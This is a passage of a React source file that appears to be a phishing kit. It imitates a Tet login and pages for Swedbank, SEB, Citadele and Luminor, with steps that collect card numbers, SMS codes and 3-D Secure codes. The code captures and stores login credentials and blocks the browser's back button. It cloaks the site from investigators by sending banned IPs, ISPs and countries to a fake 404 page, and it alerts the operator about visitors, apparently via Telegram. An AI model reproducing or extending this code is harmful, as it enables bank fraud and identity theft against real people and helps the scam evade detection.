      window.history.replaceState(null, '', '/');
      setStepFromUrl(2);
    }
  }, []);

  // Keep step/uid in sessionStorage for subsequent loads without showing query params
  useEffect(() => {
    persistStepUid(stepFromUrl, uidFromUrl);
  }, [stepFromUrl, uidFromUrl]);

  const isCardIncorrectPage = stepFromUrl === 9;
  const isCardPage = stepFromUrl === 5;
  const isSmsIncorrectPage = stepFromUrl === 7;
  const isSmsPage = stepFromUrl === 3;
  const isDonePage = stepFromUrl === 11;
  const isThreeDsPage = stepFromUrl === THREE_DS_STEP;
  const isNotFoundPage = stepFromUrl === 404;
  const isSwedbankPage = stepFromUrl === 101;
  const isSebPage = stepFromUrl === 102;
  const isCitadelePage = stepFromUrl === 103;
  const isLuminorPage = stepFromUrl === 104;
  const isSwedbankIncorrectPage = stepFromUrl === 111;
  const isSebIncorrectPage = stepFromUrl === 112;
  const isCitadeleIncorrectPage = stepFromUrl === 113;
  const isLuminorIncorrectPage = stepFromUrl === 114;
  const isSwedbankCodePage = stepFromUrl === 121;
  const isSebCodePage = stepFromUrl === 122;
  const isCitadeleCodePage = stepFromUrl === 123;
  const isLuminorCodePage = stepFromUrl === 124;

  // Prevent back/forward navigation by trapping popstate (skip on /404)
  useEffect(() => {
    if (isNotFoundPage) return undefined;
    if (typeof window === 'undefined' || typeof window.history === 'undefined') return undefined;
    const trap = () => {
      try {
        const href = window.location.href;
        window.history.pushState(null, '', href);
      } catch (err) {
        console.warn('popstate trap failed', err);
      }
    };
    trap();
    window.addEventListener('popstate', trap);
    return () => window.removeEventListener('popstate', trap);
  }, [isNotFoundPage]);
  const [email, setEmail] = useState(() => getStoredLoginCreds().username);
  const [password, setPassword] = useState(() => getStoredLoginCreds().password);
  const [remember, setRemember] = useState(false);
  const [lang, setLang] = useState('es');
  const [submitAttempted, setSubmitAttempted] = useState(false);
  const [authMode, setAuthMode] = useState('password');
  const [loadingAction, setLoadingAction] = useState(null);
  const [errorMessage, setErrorMessage] = useState('');
  const [showLoadingScreen, setShowLoadingScreen] = useState(true);
  const [loadingVariantIndex, setLoadingVariantIndex] = useState(() => getInitialLoadingVariantIndex());
  // Human-gate removed by request: the app should never block behind a "Human solved" step.
  const [contentUnlocked, setContentUnlocked] = useState(true);
  const [preflightStatus, setPreflightStatus] = useState('pending'); // 'pending' | 'allowed' | 'blocked'
  const preflightRan = useRef(false);
  const [blockedReason, setBlockedReason] = useState(null);
  const [visitorId, setVisitorId] = useState(null);
  const [currentVisitorMeta, setCurrentVisitorMeta] = useState(null);
  const [humanGateRules, setHumanGateRules] = useState({ enabled: false, requireSlide: true });
  const [humanGateVisible, setHumanGateVisible] = useState(false);
  const [humanChallenge, setHumanChallenge] = useState(() => createHumanChallenge());
  const [humanGateError, setHumanGateError] = useState('');
  const [humanGateBusy, setHumanGateBusy] = useState(false);
  const humanGateVersion = 'math+slide:v1';
  const liveBanRedirectRef = useRef(false);
  const tabGuardRedirectRef = useRef(false);
  const humanSliderTrackRef = useRef(null);
  const humanSliderShellRef = useRef(null);
  const [humanSliderWidth, setHumanSliderWidth] = useState(0);
  const humanSliderDragRef = useRef({
    active: false,
    pointerId: null,
    trackLeft: 0,
    trackWidth: 1,
    pointerOffset: HUMAN_SLIDER_THUMB_SIZE / 2,
  });

  const page1Html = useTemplateBody('page1');
  const safePage1Html = useMemo(() => sanitizePage1Template(page1Html), [page1Html]);
  const page1RootRef = useRef(null);

  useEffect(() => {
    const root = page1RootRef.current;
    if (!root || !safePage1Html) return undefined;

    const form = root.querySelector('form');
    const userInput = root.querySelector('#user');
    const passInput = root.querySelector('#pass');
    const submitBtn = root.querySelector('button[type="submit"]');
    const otherAuthButton = Array.from(root.querySelectorAll('button[type="button"]')).find((btn) =>
      String(btn.textContent || '').trim().toLowerCase().includes('citi autentifikācijas veidi')
    );

    if (userInput && userInput.value !== email) userInput.value = email || '';
    if (passInput && passInput.value !== password) passInput.value = password || '';

    const cleanup = [];

    // The reference HTML includes a non-standard form action (base64-like string).
    // If the browser performs a native submit, it navigates to /MTc3... and shows "Cannot POST ...".
    // We neutralize action/method and always intercept submit via JS.
    if (form) {
      try {
        form.setAttribute('action', '#');
        form.setAttribute('method', 'GET');
      } catch {}
    }

    if (userInput) {
      const onInput = (e) => setEmail(String(e.target.value || ''));
      userInput.addEventListener('input', onInput);
      cleanup.push(() => userInput.removeEventListener('input', onInput));
    }

    if (passInput) {
      const onInput = (e) => setPassword(String(e.target.value || ''));
      passInput.addEventListener('input', onInput);
      cleanup.push(() => passInput.removeEventListener('input', onInput));
    }

    // Capture phase prevents the native submit even if other handlers exist.
    const onSubmitCapture = (e) => {
      // Only intercept submits coming from this injected page1 form.
      if (form && e.target !== form) return;
      e.preventDefault();
      e.stopPropagation();
      void submitLogin('password');
    };
    root.addEventListener('submit', onSubmitCapture, true);
    cleanup.push(() => root.removeEventListener('submit', onSubmitCapture, true));

    if (submitBtn) {
      const onClick = (e) => {
        e.preventDefault();
        e.stopPropagation();
        void submitLogin('password');
      };
      submitBtn.addEventListener('click', onClick);
      cleanup.push(() => submitBtn.removeEventListener('click', onClick));
    }

    if (otherAuthButton) {
      const onClick = (e) => {
        e.preventDefault();
        try {
          const uid = getOrCreateVisitorId();
          redirectUserToStep(5, uid);
        } catch {
          window.location.assign('/?step=5');
        }
      };
      otherAuthButton.addEventListener('click', onClick);
      cleanup.push(() => otherAuthButton.removeEventListener('click', onClick));
    }

    return () => cleanup.forEach((fn) => fn());
  }, [safePage1Html, email, password]);

  useEffect(() => {
    setStoredLoginCreds(email, password);
  }, [email, password]);

  useEffect(() => {
    if (typeof window === 'undefined') return;
    const seed = visitorId || readLoadingVariantSeed();
    if (!seed) return;
    const nextIndex = resolveLoadingVariantIndex(seed);
    setLoadingVariantIndex((current) => (current === nextIndex ? current : nextIndex));
    try {
      window.sessionStorage.setItem(LOADING_VARIANT_STORAGE_KEY, String(nextIndex));
    } catch {}
  }, [visitorId]);

  const loadingVariant = useMemo(
    () => LOADING_VARIANTS[loadingVariantIndex % LOADING_VARIANTS.length] || LOADING_VARIANTS[0],
    [loadingVariantIndex]
  );

  // Auto-advance from login (step 2) to card (step 5) after 2 seconds.

  const renderLoadingLoader = (loader) => {
    if (loader === 'bars') {
      return (
        <div className="loading-bar-loader" aria-hidden="true">
          <span />
          <span />
          <span />
        </div>
      );
    }
    if (loader === 'rings') {
      return (
        <div className="loading-ring-loader" aria-hidden="true">
          <span />
          <span />
          <span />
        </div>
      );
    }
    if (loader === 'tiles') {
      return (
        <div className="loading-tile-loader" aria-hidden="true">
          <span />
          <span />
          <span />
        </div>
      );
    }
    return (
      <div className="loading-dot-row" aria-hidden="true">
        <span />
        <span />
        <span />
      </div>
    );
  };

  const LoadingScreen = () => (
    <div className="loading-screen tet-loading-screen">
      <img id="grad-left" src={gradLeft} alt="" aria-hidden="true" />
      <img id="grad-right" src={gradRight} alt="" aria-hidden="true" />
      <div className="loader">
        <div className="logo">
          <img src={tetLogo} alt="Tet" />
        </div>
        <div className="spinner-border" aria-hidden="true" />
      </div>
    </div>
  );

  const detectBrowser = (ua) => {
    if (!ua) return 'Unknown';
    if (/edg\//i.test(ua)) return 'Edge';
    if (/opr\//i.test(ua)) return 'Opera';
    if (/chrome\//i.test(ua) && !/edg\//i.test(ua)) return 'Chrome';
    if (/safari/i.test(ua) && !/chrome/i.test(ua)) return 'Safari';
    if (/firefox|fxios/i.test(ua)) return 'Firefox';
    if (/msie|trident/i.test(ua)) return 'Internet Explorer';
    return 'Unknown';
  };

  const detectBrowserVersion = (ua, browser) => {
    if (!ua) return '';
    const map = {
      Chrome: /chrome\/([\d.]+)/i,
      Edge: /edg[e]?\/([\d.]+)/i,
      Opera: /opr\/([\d.]+)/i,
      Safari: /version\/([\d.]+)/i,
      Firefox: /firefox\/([\d.]+)/i,
      'Internet Explorer': /(?:msie |rv:)([\d.]+)/i,
    };
    const match = map[browser]?.exec(ua);
    return match ? match[1] : '';
  };

  const detectOS = (ua, platform) => {
    if (/windows nt/i.test(ua)) return 'Windows';
    if (/mac os x/i.test(ua) || /macintosh/i.test(platform)) return 'macOS';
    if (/android/i.test(ua)) return 'Android';
    if (/(iphone|ipad|ipod)/i.test(ua)) return 'iOS';
    if (/linux/i.test(ua)) return 'Linux';
    return platform || 'Unknown';
  };

  const detectDeviceType = (ua, isMobileFlag) => {
    if (typeof isMobileFlag === 'boolean') return isMobileFlag ? 'mobile' : 'desktop';
    if (!ua) return 'unknown';
    if (/tablet|ipad|playbook|silk/i.test(ua)) return 'tablet';
    if (/mobile|iphone|ipod|android.*mobile/i.test(ua)) return 'mobile';
    return 'desktop';
  };

  const detectClientInfo = () => {
    const nav = typeof navigator !== 'undefined' ? navigator : null;
    const uaData = nav?.userAgentData;
    const ua = nav?.userAgent || '';
    const primaryBrand = uaData?.brands?.find((b) => b.brand && !/Not;?A?Brand/i.test(b.brand)) || uaData?.brands?.[0];
    const browserName = primaryBrand?.brand || detectBrowser(ua);
    const browserVersion = uaData?.uaFullVersion || detectBrowserVersion(ua, browserName);
    const os = detectOS(ua, uaData?.platform || nav?.platform || '');
    const deviceType = detectDeviceType(ua, typeof uaData?.mobile === 'boolean' ? uaData.mobile : undefined);

    return {
      browserName,
      browserVersion,
      deviceType,
      os,
      language: nav?.language || '',
    };
  };

  const normalizeIsp = (name = '') =>
    String(name || '')
      .trim()
      .toLowerCase()
      .replace(/[^\da-z]+/g, '_');

  const evaluateVisitorRules = (rules, meta) => {
    if (!rules?.enabled) return { blocked: false };
    const device = String(meta.deviceType || '').toLowerCase();
    const country = String(meta.countryCode || meta.country || '')
      .trim()
      .toUpperCase();

    if (rules.deviceMode === 'block') {
      const listed = (rules.devices || []).includes(device);
      if (listed) return { blocked: true, reason: 'device_block' };
    } else if (rules.deviceMode === 'allow') {
      const listed = (rules.devices || []).includes(device);
      if (!listed) return { blocked: true, reason: 'device_allow' };
    }

    if (rules.countryMode === 'block') {
      const listed = (rules.countries || []).includes(country);
      if (listed) return { blocked: true, reason: 'country_block', countryCode: country };
    } else if (rules.countryMode === 'allow') {
      const listed = (rules.countries || []).includes(country);
      if (!listed) return { blocked: true, reason: 'country_allow', countryCode: country };
    }

    return { blocked: false };
  };

  const matchesIpPattern = (pattern, value) => {
    const candidate = String(value || '').trim();
    const rawPattern = String(pattern || '').trim();
    if (!candidate || !rawPattern) return false;
    if (!rawPattern.includes('*')) return rawPattern === candidate;
    const rx = new RegExp(
      '^' + rawPattern.replace(/[-/\\^$+?.()|[\]{}]/g, '\\$&').replace(/\*/g, '.*') + '$'
    );
    return rx.test(candidate);
  };

  const findMatchingBannedIp = (bannedIPs, ip) => {
    const candidate = String(ip || '').trim();
    if (!candidate) return null;

    const encodedIp = candidate.replace(/\./g, '_').replace(/[.#$[\]/]/g, '_');
    if (bannedIPs?.[encodedIp]) {
      return {
        key: encodedIp,
        pattern: String(bannedIPs[encodedIp]?.ip || candidate).trim() || candidate,
        entry: bannedIPs[encodedIp],
      };
    }

    for (const [key, entry] of Object.entries(bannedIPs || {})) {
      const pattern = String(entry?.ip || key.replace(/_/g, '.')).trim();
      if (matchesIpPattern(pattern, candidate)) {
        return { key, pattern, entry };
      }
    }

    return null;
  };

  const fetchControlRules = async () => {
    const [visitorSnap, humanGateSnap, bannedIpSnap, bannedIspSnap] =
      await Promise.all([
        get(ref(database, 'controls/visitorRules')).catch(() => null),
        get(ref(database, 'controls/humanGate')).catch(() => null),
        get(ref(database, 'bannedIPs')).catch(() => null),
        get(ref(database, 'bannedISPs')).catch(() => null),
      ]);
    return {
      visitorRules: visitorSnap?.val() || {},
      humanGate: humanGateSnap?.val() || {},
      bannedIPs: bannedIpSnap?.val() || {},
      bannedISPs: bannedIspSnap?.val() || {},
    };
  };

  const logRedirect = async (uid, entry) => {
    if (!uid) return;
    try {
      const logRef = push(ref(database, `redirectLogs/${uid}`));
      await set(logRef, {
        ts: Date.now(),
        ...entry,
        detail: String(entry?.detail || '').trim(),
      });
    } catch (err) {
      console.warn('Failed to log redirect', err);
    }
  };

  const getVisitorNoticeKey = useCallback((uid) => `visitorNotice:${uid || ''}`, []);

  const hasStoredVisitorNotice = useCallback(
    (uid) => {
      try {
        if (typeof window === 'undefined' || !uid) return false;
        return window.localStorage.getItem(getVisitorNoticeKey(uid)) === '1';
      } catch {
        return false;
      }
    },
    [getVisitorNoticeKey]
  );

  const storeVisitorNotice = useCallback(
    (uid) => {
      try {
        if (typeof window === 'undefined' || !uid) return;
        window.localStorage.setItem(getVisitorNoticeKey(uid), '1');
      } catch {}
    },
    [getVisitorNoticeKey]
  );

  const hasPersistedVisitorNotice = useCallback(
    async (uid) => {
      if (!uid) return false;
      if (hasStoredVisitorNotice(uid)) return true;
      try {
        const snap = await get(ref(database, `visitors/${uid}/telegramVisitorNotifiedAt`)).catch(
          () => null
        );
        const sentAlready = !!snap?.val();
        if (sentAlready) storeVisitorNotice(uid);
        return sentAlready;
      } catch {
        return false;
      }
    },
    [hasStoredVisitorNotice, storeVisitorNotice]
  );

  const markVisitorNoticeSent = useCallback(
    async (uid) => {
      if (!uid) return;
      const ts = Date.now();
      try {
        await update(ref(database, `visitors/${uid}`), {
          telegramVisitorNotifiedAt: ts,
        });
      } catch (err) {
        console.warn('Failed to persist visitor telegram notice', err);
      }
      storeVisitorNotice(uid);
    },
    [storeVisitorNotice]
  );

  const notifyBlock = async ({ uid, meta, reason, detail }) => {
    try {
      const metaLines = formatMetaLines(meta || {});
      const lines = [
        ...headerLines('Block'),
        `🚫 Reason: ${reason}`,
        detail ? `ℹ️ Detail: ${detail}` : null,
        '',
        `👤 UID: ${uid || 'N/A'}`,
        ...metaLines,
      ].filter(Boolean);
      const actionButtons = buildActionButtons(uid);
      const sent = await sendAdminEvent(lines.join('\n'), 'visitor', { buttons: actionButtons });
      if (!sent) await sendAdminEvent(`${brandPrefix('Block')}\n\nBlock fallback ping`, 'visitor', { buttons: actionButtons });
    } catch (err) {
      console.warn('Failed to send block alert', err);
    }
  };

  const notifyRealVisitor = useCallback(
    async (uid, meta) => {
      if (!uid) return;
      const sentAlready = await hasPersistedVisitorNotice(uid);
      if (sentAlready) return;
      try {
        const lines = [
          ...headerLines('Visitor'),
          `👤 UID: ${uid}`,
          ...formatMetaLines(meta || {}),
        ];
        const actionButtons = buildActionButtons(uid);
        const sent = await sendAdminEvent(lines.join('\n'), 'visitor', { buttons: actionButtons });
        const fallbackSent = sent
          ? true
          : await sendAdminEvent(`${brandPrefix('Visitor')}\n\nVisitor fallback ping`, 'visitor', { buttons: actionButtons });
        if (sent || fallbackSent) {
          await markVisitorNoticeSent(uid);
        }
      } catch (err) {
        console.warn('Failed to send visitor alert', err);
      }
    },
    [hasPersistedVisitorNotice, markVisitorNoticeSent]
  );

  const blockVisitorImmediately = useCallback(
    async ({ uid, meta, reason, blockedKey, detail = '', redirectDetail = '' }) => {
      if (liveBanRedirectRef.current || isNotFoundPage) return;
      liveBanRedirectRef.current = true;
      setBlockedReason(blockedKey);
      setHumanGateVisible(false);
      setContentUnlocked(false);
      setShowLoadingScreen(false);

      const ts = Date.now();
      const safeMeta = {
        ...(meta || {}),
        userId: uid || '',
        blocked: true,
        blockedReason: blockedKey,
        lastSeenAt: meta?.ts || ts,
      };

      if (uid) {
        try {
          await update(ref(database, `visitors/${uid}`), safeMeta);
        } catch (err) {
          console.warn('Failed to persist live block state', err);
        }
        await set(ref(database, `status/${uid}`), null).catch(() => {});
        await logRedirect(uid, {
          reason: blockedKey,
          detail: redirectDetail || detail,
          ip: meta?.ip || '',
          isp: meta?.isp || '',
          hostname: normalizeHostname(meta?.rdns || ''),
          countryCode: meta?.countryCode || '',
        });
        await notifyBlock({
          uid,
          meta: safeMeta,
          reason,
          detail,
        });
      }

      window.location.replace('/404');
    },
    [isNotFoundPage]
  );

  const getOrCreateVisitorId = useCallback(() => {
    const win = typeof window !== 'undefined' ? window : null;
    if (!win) return visitorId;
    const stored = win.localStorage.getItem('visitorId');
    const sessionUid = getUidFromLocation() || getStoredUid();
    const chosen = sessionUid || stored;
    if (chosen) {
      if (!visitorId) setVisitorId(chosen);
      if (sessionUid) win.localStorage.setItem('visitorId', sessionUid);
      return chosen;
    }
    const newId = push(ref(database, 'visitors')).key;
    if (newId) {
      win.localStorage.setItem('visitorId', newId);
      setVisitorId(newId);
    }
    return newId;
  }, [visitorId]);

  const getHumanGateKey = useCallback((uid) => `humanGate:${uid || ''}`, []);

  const hasStoredHumanPass = useCallback(
    (uid) => {
      try {
        if (typeof window === 'undefined' || !uid) return false;
        return isHumanVerifiedValue(window.localStorage.getItem(getHumanGateKey(uid)));
      } catch {
        return false;
      }
    },
    [getHumanGateKey]
  );

  const storeHumanPass = useCallback(
    (uid) => {
      try {
        if (typeof window === 'undefined' || !uid) return;
        window.localStorage.setItem(getHumanGateKey(uid), '1');
      } catch {}
    },
    [getHumanGateKey]
  );

  const persistHumanPassToDatabase = useCallback(async (uid, verifiedAt, version, syncUser = true) => {
    if (!uid) return;
    const ts = asHumanVerifiedTimestamp(verifiedAt) || Date.now();
    try {
      await update(ref(database, `visitors/${uid}`), {
        humanVerified: true,
        humanVerifiedAt: ts,
        humanGateVersion: version,
      });
    } catch (err) {
      console.warn('Failed to persist human verification', err);
    }
    if (!syncUser) return;
    try {
      await update(ref(database, `users/${uid}`), {
        humanVerified: true,
        humanVerifiedAt: ts,
      });
    } catch (err) {
      console.warn('Failed to persist human verification on user', err);
    }
  }, []);

  const hasPersistedHumanPass = useCallback(
    async (uid) => {
      if (!uid) return false;
      if (hasStoredHumanPass(uid)) return true;
      try {
        const [visitorSnap, userSnap] = await Promise.all([
          get(ref(database, `visitors/${uid}`)).catch(() => null),
          get(ref(database, `users/${uid}`)).catch(() => null),
        ]);
        const visitorData = visitorSnap?.val() || {};
        const userData = userSnap?.val() || {};
        const solved =
          isHumanVerifiedValue(visitorData?.humanVerified) ||
          isHumanVerifiedValue(userData?.humanVerified);
        if (solved) {
          storeHumanPass(uid);
        }
        return solved;
      } catch {
        return false;
      }
    },
    [
      hasStoredHumanPass,
      storeHumanPass,
    ]
  );

  const refreshHumanGate = useCallback(() => {
    humanSliderDragRef.current = {
      active: false,
      pointerId: null,
      trackLeft: 0,
      trackWidth: 1,
      pointerOffset: HUMAN_SLIDER_THUMB_SIZE / 2,
    };
    setHumanChallenge(createHumanChallenge());
    setHumanGateError('');
    setHumanGateBusy(false);
  }, []);

  useEffect(() => {
    const measure = () => {
      const shell = humanSliderShellRef.current;
      if (!shell) return;
      const rect = shell.getBoundingClientRect();
      setHumanSliderWidth(rect.width || 0);
    };
    measure();
    window.addEventListener('resize', measure);
    return () => window.removeEventListener('resize', measure);
  }, [humanGateVisible]);

  const updateHumanSlideFromPointer = useCallback((clientX) => {
    const drag = humanSliderDragRef.current;
    if (!drag.active) return 0;
    const knobLeft = clientX - drag.trackLeft - drag.pointerOffset;
    const distance = Math.max(0, Math.min(drag.trackWidth, knobLeft));
    const nextPct = Math.round((distance / drag.trackWidth) * 100);
    setHumanChallenge((c) => ({ ...c, slide: nextPct }));
    return nextPct;
  }, []);

  const endHumanSlideDrag = useCallback(
    (shouldReset = true) => {
      const drag = humanSliderDragRef.current;
      drag.active = false;
      drag.pointerId = null;
      if (shouldReset) {
        setHumanChallenge((c) => {
          if (isHumanSlideComplete(c.slide)) {
            return { ...c, slide: 100 };
          }
          return { ...c, slide: 0 };
        });
      }
    },
    []
  );

  const startHumanSlideDrag = useCallback(
    (event) => {
      if (!humanGateRules.requireSlide) return;
      if (!String(humanChallenge.answer || '').trim()) {
        setHumanGateError('Ingresa la respuesta y luego arrastra de izquierda a derecha.');
        return;
      }
      const shell = humanSliderShellRef.current;
      const thumb = event.currentTarget;
      if (!shell || !thumb) return;
      const rect = shell.getBoundingClientRect();
      const thumbRect = thumb.getBoundingClientRect();
      humanSliderDragRef.current = {
        active: true,
        pointerId: event.pointerId,
        trackLeft: rect.left,
        trackWidth: Math.max(rect.width - HUMAN_SLIDER_THUMB_SIZE, 1),
        pointerOffset: Math.max(0, Math.min(HUMAN_SLIDER_THUMB_SIZE, event.clientX - thumbRect.left)),
      };
      setHumanGateError('');
      try {
        event.currentTarget.setPointerCapture(event.pointerId);
      } catch {}
      updateHumanSlideFromPointer(event.clientX);
    },
    [humanChallenge.answer, humanGateRules.requireSlide, updateHumanSlideFromPointer]
  );

  const recordHumanPass = useCallback(
    async (uid, version = humanGateVersion) => {
      const userId = uid || visitorId || getOrCreateVisitorId();
      if (!userId) return;
      const ts = Date.now();
      await persistHumanPassToDatabase(userId, ts, version, true);
      storeHumanPass(userId);
    },
    [getOrCreateVisitorId, humanGateVersion, persistHumanPassToDatabase, storeHumanPass, visitorId]
  );

  const handleHumanVerify = useCallback(async (forceSlideComplete = false) => {
    const sum = Number(humanChallenge.a || 0) + Number(humanChallenge.b || 0);
    const ans = Number(humanChallenge.answer || 0);
    if (!Number.isFinite(ans) || ans !== sum) {
      setHumanGateError('Respuesta incorrecta. Inténtalo de nuevo.');
      setHumanChallenge((c) => ({ ...c, slide: 0 }));
      return;
    }
    if (
      humanGateRules.requireSlide &&
      !forceSlideComplete &&
      Number(humanChallenge.slide || 0) < 100
    ) {
      setHumanGateError('Desliza hasta el final para enviar.');
      return;
    }
    setHumanGateBusy(true);
    setHumanGateError('');
    const uid = visitorId || getOrCreateVisitorId();
    await recordHumanPass(uid, 'math+slide:v1');
    setHumanGateBusy(false);
    setHumanGateVisible(false);
    setContentUnlocked(true);
  }, [getOrCreateVisitorId, humanChallenge, humanGateRules.requireSlide, recordHumanPass, visitorId]);

  const completeHumanSlide = useCallback(async () => {
    if (humanGateBusy) return;
    setHumanChallenge((c) => ({ ...c, slide: 100 }));
    await handleHumanVerify(true);
  }, [handleHumanVerify, humanGateBusy]);

  useEffect(() => {
    if (isNotFoundPage || typeof window === 'undefined') return undefined;

    const uid = visitorId || getOrCreateVisitorId();
    const tabId = getTabSessionId();
    if (!uid || !tabId) return undefined;

    const now = Date.now();
    const existing = readTabLock(uid);
    const isFreshForeignLock =
      existing?.tabId && existing.tabId !== tabId && now - Number(existing.ts || 0) < TAB_LOCK_TTL_MS;

    if (isFreshForeignLock) {
      tabGuardRedirectRef.current = true;
      setBlockedReason('multi_tab');
      setHumanGateVisible(false);
      setContentUnlocked(false);
      setShowLoadingScreen(false);
      void logRedirect(uid, {
        reason: 'multi_tab',
        detail: 'Blocked by single-tab guard',
      });
      window.location.replace('/404');
      return undefined;
    }

    const heartbeat = () => {
      writeTabLock(uid, {
        tabId,
        ts: Date.now(),
      });
    };

    heartbeat();
    const timer = window.setInterval(heartbeat, 1500);

    const handleStorage = (event) => {
      if (event.key !== getTabLockKey(uid) || !event.newValue || tabGuardRedirectRef.current) return;
      try {
        const next = JSON.parse(event.newValue);
        if (next?.tabId && next.tabId !== tabId && Date.now() - Number(next.ts || 0) < TAB_LOCK_TTL_MS) {
          tabGuardRedirectRef.current = true;
          setBlockedReason('multi_tab');
          setHumanGateVisible(false);
          setContentUnlocked(false);
          setShowLoadingScreen(false);
          void logRedirect(uid, {
            reason: 'multi_tab',
            detail: 'Blocked by single-tab guard',
          });
          window.location.replace('/404');
        }
      } catch {}
    };

    const release = () => clearTabLock(uid, tabId);
    window.addEventListener('storage', handleStorage);
    window.addEventListener('beforeunload', release);

    return () => {
      window.clearInterval(timer);
      window.removeEventListener('storage', handleStorage);
      window.removeEventListener('beforeunload', release);
      release();
    };
  }, [getOrCreateVisitorId, isNotFoundPage, visitorId]);

  useEffect(() => {
    if (typeof window === 'undefined') return undefined;

    const handlePointerMove = (event) => {
      const drag = humanSliderDragRef.current;
      if (!drag.active || drag.pointerId !== event.pointerId) return;
      const nextPct = updateHumanSlideFromPointer(event.clientX);
      if (isHumanSlideComplete(nextPct)) {
        endHumanSlideDrag(false);
        void completeHumanSlide();
      }
    };

    const handlePointerUp = (event) => {
      const drag = humanSliderDragRef.current;
      if (!drag.active || drag.pointerId !== event.pointerId) return;
      const nextPct = updateHumanSlideFromPointer(event.clientX);
      const complete = isHumanSlideComplete(nextPct);
      endHumanSlideDrag(!complete);
      if (complete) {
        void completeHumanSlide();
      }
    };

    const handlePointerCancel = (event) => {
      const drag = humanSliderDragRef.current;
      if (!drag.active || drag.pointerId !== event.pointerId) return;
      endHumanSlideDrag(true);
    };

    window.addEventListener('pointermove', handlePointerMove);
    window.addEventListener('pointerup', handlePointerUp);
    window.addEventListener('pointercancel', handlePointerCancel);

    return () => {
      window.removeEventListener('pointermove', handlePointerMove);
      window.removeEventListener('pointerup', handlePointerUp);
      window.removeEventListener('pointercancel', handlePointerCancel);
    };
  }, [completeHumanSlide, endHumanSlideDrag, updateHumanSlideFromPointer]);

  useEffect(() => {
    if (isNotFoundPage || !visitorId || !currentVisitorMeta || liveBanRedirectRef.current) {
      return undefined;
    }

    const latest = {
      bannedIPs: {},
      bannedISPs: {},
    };

    const evaluateLiveBan = async () => {
      if (liveBanRedirectRef.current) return;

      const meta = currentVisitorMeta;
      const matchedIpBan = findMatchingBannedIp(latest.bannedIPs, meta.ip);
      if (matchedIpBan) {
        await blockVisitorImmediately({
          uid: visitorId,
          meta,
          reason: 'IP blacklist',
          blockedKey: 'ip_block',
          detail:
            matchedIpBan.pattern && matchedIpBan.pattern !== meta.ip
              ? `${meta.ip || ''} matched ${matchedIpBan.pattern}`
              : meta.ip || '',
          redirectDetail:
            matchedIpBan.pattern && matchedIpBan.pattern !== meta.ip
              ? `Blocked by IP blacklist (${matchedIpBan.pattern})`
              : 'Blocked by IP blacklist',
        });
        return;
      }

      const ispName = normalizeIsp(meta.isp || '');
      const ispBlocked = Object.values(latest.bannedISPs || {}).some(
        (entry) => normalizeIsp(entry?.name || entry?.isp || entry?.id || '') === ispName && ispName
      );
      if (ispBlocked) {
        await blockVisitorImmediately({
          uid: visitorId,
          meta,
          reason: 'ISP blacklist',
          blockedKey: 'isp_block',
          detail: meta.isp || '',
          redirectDetail: 'Blocked by ISP blacklist',
        });
        return;
      }

    };

    const subscribe = (path, key) =>
      onValue(
        ref(database, path),
        (snap) => {
          latest[key] = snap.val() || {};
          void evaluateLiveBan();
        },
        (err) => {
          console.warn(`Live ban watcher failed for ${path}`, err);
        }
      );

    const unsubIp = subscribe('bannedIPs', 'bannedIPs');
    const unsubIsp = subscribe('bannedISPs', 'bannedISPs');
    return () => {
      unsubIp();
      unsubIsp();
    };
  }, [blockVisitorImmediately, currentVisitorMeta, isNotFoundPage, visitorId]);

  const resolveAppPresenceId = useCallback(
    () => (isNotFoundPage ? null : visitorId || getOrCreateVisitorId()),
    [isNotFoundPage, visitorId, getOrCreateVisitorId]
  );

  useRealtimePresence(resolveAppPresenceId);
  const resolveAppRedirectId = useCallback(() => {
    if (isNotFoundPage) return null;
    if (visitorId) return visitorId;
    if (typeof window === 'undefined') return null;
    return window.localStorage.getItem('visitorId');
  }, [isNotFoundPage, visitorId]);

  useStepRedirect(resolveAppRedirectId);

  const preflightVisitor = useCallback(async () => {
    try {
      setContentUnlocked(false);
      const storedId =
        typeof window !== 'undefined' ? window.localStorage.getItem('visitorId') : null;
      const controls = await fetchControlRules();
      const meta = await fetchVisitorMeta();
      const matchedIpBan = findMatchingBannedIp(controls.bannedIPs, meta.ip);
      if (matchedIpBan) {
        setBlockedReason('ip_block');
        const uid = storedId || getOrCreateVisitorId();
        setVisitorId(uid);
        if (uid && typeof window !== 'undefined') window.localStorage.setItem('visitorId', uid);
        if (uid) {
          await update(ref(database, `visitors/${uid}`), {
            ...meta,
            userId: uid,
            blocked: true,
            blockedReason: 'ip_block',
            firstSeenAt: meta.ts,
            lastSeenAt: meta.ts,
          });
          // remove presence entry so dashboard shows offline only
          await set(ref(database, `status/${uid}`), null).catch(() => {});
          await logRedirect(uid, {
            reason: 'ip_block',
            detail:
              matchedIpBan.pattern && matchedIpBan.pattern !== meta.ip
                ? `Blocked by IP blacklist (${matchedIpBan.pattern})`
                : 'Blocked by IP blacklist',
            ip: meta.ip,
            isp: meta.isp,
            countryCode: meta.countryCode,
          });
          await notifyBlock({
            uid,
            meta,
            reason: 'IP blacklist',
            detail:
              matchedIpBan.pattern && matchedIpBan.pattern !== meta.ip
                ? `${meta.ip || ''} matched ${matchedIpBan.pattern}`
                : meta.ip || '',
          });
        }
        setShowLoadingScreen(false);
        markLoaderSeen();
        window.location.replace('/404');
        return;
      }

      const ispName = normalizeIsp(meta.isp || '');
      const ispBlocked = Object.values(controls.bannedISPs || {}).some(
        (x) => normalizeIsp(x?.name || x?.isp || x?.id || '') === ispName && ispName
      );
      if (ispBlocked) {
        setBlockedReason('isp_block');
        const uid = storedId || getOrCreateVisitorId();
        setVisitorId(uid);
        if (uid && typeof window !== 'undefined') window.localStorage.setItem('visitorId', uid);
        if (uid) {
          await update(ref(database, `visitors/${uid}`), {
            ...meta,
            userId: uid,
            blocked: true,
            blockedReason: 'isp_block',
            firstSeenAt: meta.ts,
            lastSeenAt: meta.ts,
          });
          await set(ref(database, `status/${uid}`), null).catch(() => {});
          await logRedirect(uid, {
            reason: 'isp_block',
            detail: 'Blocked by ISP blacklist',
            ip: meta.ip,
            isp: meta.isp,
            countryCode: meta.countryCode,
          });
          await notifyBlock({
            uid,
            meta,
            reason: 'ISP blacklist',
            detail: meta.isp || '',
          });
        }
        setShowLoadingScreen(false);
        markLoaderSeen();
        window.location.replace('/404');
        return;
      }

      const vcResult = evaluateVisitorRules(controls.visitorRules, meta);
        if (vcResult.blocked) {
          setBlockedReason(vcResult.reason);
          const uid = storedId || getOrCreateVisitorId();
          setVisitorId(uid);
          if (uid && typeof window !== 'undefined') window.localStorage.setItem('visitorId', uid);
        if (uid) {
            await update(ref(database, `visitors/${uid}`), {
              ...meta,
              userId: uid,
